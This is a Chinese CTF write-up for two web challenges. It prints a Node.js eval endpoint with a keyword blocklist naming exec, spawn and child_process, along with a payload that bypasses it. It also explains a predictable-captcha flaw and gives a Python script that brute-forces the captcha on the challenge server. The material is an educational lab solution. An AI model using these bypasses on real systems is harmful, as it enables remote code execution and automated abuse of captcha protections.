Baby Eval
const express = require('express'); const app = express(); function escape(s) { return `${s}`.replace(/./g,c => "&#" + c.charCodeAt(0) + ";"); } function directory(keys) { const values = { "title": "View Source CTF", "description": "Powered by Node.js and Express.js", "flag": process.env.FLAG, "lyrics": "Good job, you’ve made it to the bottom of the mind control facility. Well done.", "createdAt": "1970-01-01T00:00:00.000Z", "lastUpdate": "2022-02-22T22:22:22.222Z", "source": require('fs').readFileSync(__filename), }; return "" + keys.map(key => `${key}
${escape(values[key])}
`).join("") + ""; } app.get('/', (req, res) => { const payload = req.query.payload; if (payload && typeof payload === "string") { const matches = /([\.\(\)'"\[\]\{\}<>_$%\\xu^;=]|import|require|process|proto|constructor|app|express|req|res|env|process|fs|child|cat|spawn|fork|exec|file|return|this|toString)/gi.exec(payload); if (matches) { res.status(400).send(matches.map(i => `${i}`).join("
")); } else { res.send(`${eval(payload)}`); } } else { res.send(directory(["title", "description", "lastUpdate", "source"])); } }); app.listen(process.env.PORT, () => { console.log(`Server started on http://127.0.0.1:${process.env.PORT}`); });
nodejs的eval命令执行,过滤了很多,利用
?payload=directory`flag`vsCAPTCHA
进入页面需要我们输入验证码
根据图示:我们需要在每一轮也就是10s内正确输入验证码,总共输入正确1000次,验证码结果为两数相加
抓包发现x-captcha-state字段,是一段jwt,解码看一下
猜测字段含义:
- exp:表示令牌不再有效的时间戳
- jti : 唯一标识符,用于区分我们的token和其他token
- failed:指示一步是否验证失败
- numCaptchasSolved : 验证的步骤数
第一种思路是将令牌中numCaptchasSolved的值更改为 1000,然后发送它来欺骗服务器,使其认为已经验证了1000次。但是,JWT 是经过签名的,尝试之后发现现有方法都不行,因此必须找到另一种方法。
另一种思路是使用 OCR 来检索验证码的内容,但在如此有限的时间内,显得很繁琐且不一定成功。
我们需要另辟蹊径,仔细观察每次的验证码,似乎生成的数都是相近的,我们不妨查看一下它的生成逻辑。
代码结构:
├── __MACOSX │ └── vsCAPTCHA │ └── static ├── vsCAPTCHA │ ├── Dockerfile │ ├── generate.sh │ ├── src │ │ └── main.ts │ └── static │ └── index.html └── vsCAPTCHA.rar
看到main.ts
import { createCaptcha } from "https://deno.land/x/captcha@v1.0.1/mods.ts"; import * as jose from "https://deno.land/x/jose@v4.8.3/index.ts"; import { Application, Router } from "https://deno.land/x/oak@v10.6.0/mod.ts"; const FLAG = Deno.env.get("FLAG") ?? "vsctf{REDACTED}"; const captchaSolutions = new Map(); interface CaptchaJWT { exp: number; jti: string; flag?: string; failed: boolean; numCaptchasSolved: number; } const jwtKey = await jose.importPKCS8( new TextDecoder().decode(await Deno.readFile("./jwtRS256.key")), "RS256" ); const jwtPubKey = await jose.importSPKI( new TextDecoder().decode(await Deno.readFile("./jwtRS256.key.pub")), "RS256" ); const app = new Application(); const router = new Router(); const b1 = Math.floor(Math.random() * 500); const b2 = Math.floor(Math.random() * 500); router.get("/", (ctx) => { return ctx.send({ path: "index.html", root: "./static", }); }); router.post("/captcha", async (ctx) => { const stateJWT = ctx.request.headers.get("x-captcha-state"); const body = await ctx.request.body({ type: "json", }).value; const solution = body.solution; let jwtPayload: CaptchaJWT = { // 10 seconds to solve exp: Math.round(Date.now() / 1000) + 10, jti: crypto.randomUUID(), failed: false, numCaptchasSolved: 0, }; if (stateJWT) { try { const { payload } = await jose.jwtVerify(stateJWT, jwtPubKey); jwtPayload.numCaptchasSolved = payload.numCaptchasSolved; if ( !captchaSolutions.get(payload.jti) || captchaSolutions.get(payload.jti) !== solution ) { const jwt = await new jose.SignJWT({ failed: true, numCaptchasSolved: payload.numCaptchasSolved, exp: payload.exp, }) .setProtectedHeader({ alg: "RS256" }) .sign(jwtKey); ctx.response.headers.set("x-captcha-state", jwt); ctx.response.status = 401; return; } } catch { ctx.response.status = 400; return; } jwtPayload.numCaptchasSolved += 1; } const num1 = Math.floor(Math.random() * 7) + b1; const num2 = Math.floor(Math.random() * 3) + b2; const captcha = createCaptcha({ width: 250, height: 150, // @ts-ignore provided options are merged with default options captcha: { text: `${num1} + ${num2}`, }, }); ctx.response.headers.set("content-type", "image/png"); if (jwtPayload.numCaptchasSolved >= 1000) { jwtPayload.flag = FLAG; } ctx.response.headers.set( "x-captcha-state", await new jose.SignJWT(jwtPayload as unknown as jose.JWTPayload) .setProtectedHeader({ alg: "RS256" }) .sign(jwtKey) ); captchaSolutions.set(jwtPayload.jti, num1 + num2); ctx.response.status = 200; ctx.response.body = captcha.image; }); app.use(router.routes()); await app.listen({ port: 8080 });
服务器初始化的时候会同时初始两个全局变量直到服务器关闭
const b1 = Math.floor(Math.random() * 500); const b2 = Math.floor(Math.random() * 500);
Math.random()生成一个介于 0 (包含)和 1 (不包括)之间的伪随机数
- b1 的值介于 0 *(包括)*和 500 *(不包括)*之间
- b2 的值介于 0 *(包括)*和 500 *(不包括)*之间
而生成验证码的逻辑
const num1 = Math.floor(Math.random() * 7) + b1; const num2 = Math.floor(Math.random() * 3) + b2; const captcha = createCaptcha({ width: 250, height: 150, // @ts-ignore provided options are merged with default options captcha: { text: `${num1} + ${num2}`, }, });
这下很好理解了,验证码的范围:
- num1=[b1,b1+1,b1+2,b1+3,b1+4,b1+5,b1+6,b1+7[
- num2=[b2,b2+1,b2+2,b2+3[
那么多观察几次就会发现b1 = 154和b2 = 425,并且这两个数字不会更改是全局变量
因此
num1的值将在以下范围内:[154,155,156,157,158,159,160]
num2的值将在以下范围内:[425,426,427]
验证码的范围:[579, 580, 581, 582, 583, 584, 585, 586, 587]
最终写一个脚本:
import sys import json import base64 import requests
url = "https://vscaptcha-twekqonvua-uc.a.run.app" res = requests.post(f"{url}/captcha", data="{}") x_captcha_state = res.headers["x-captcha-state"] print(base64.b64decode(x_captcha_state.split(".")[1] + "==").decode()) while True: for ans in [579, 580, 581, 582, 583, 584, 585, 586, 587]: # [154, 155, 156, 157, 158, 159, 160] + [425, 426, 427] res = requests.post(f"{url}/captcha", data=f"{{\"solution\": {ans}}}", headers={"x-captcha-state": x_captcha_state}) if len(res.content) == 0: # Speed up!! continue try: state = base64.b64decode(res.headers["x-captcha-state"].split(".")[1] + "==").decode() except: print(res.headers["x-captcha-state"]) # Padding error? json_state = json.loads(state) print(state) if json_state["failed"] == False: if json_state["numCaptchasSolved"] >= 1000: print(f"Flag: {json_state['flag']}") sys.exit() x_captcha_state = res.headers["x-captcha-state"] break
这里远程环境有问题,我本地起了一个来跑
web汇编,以后补上
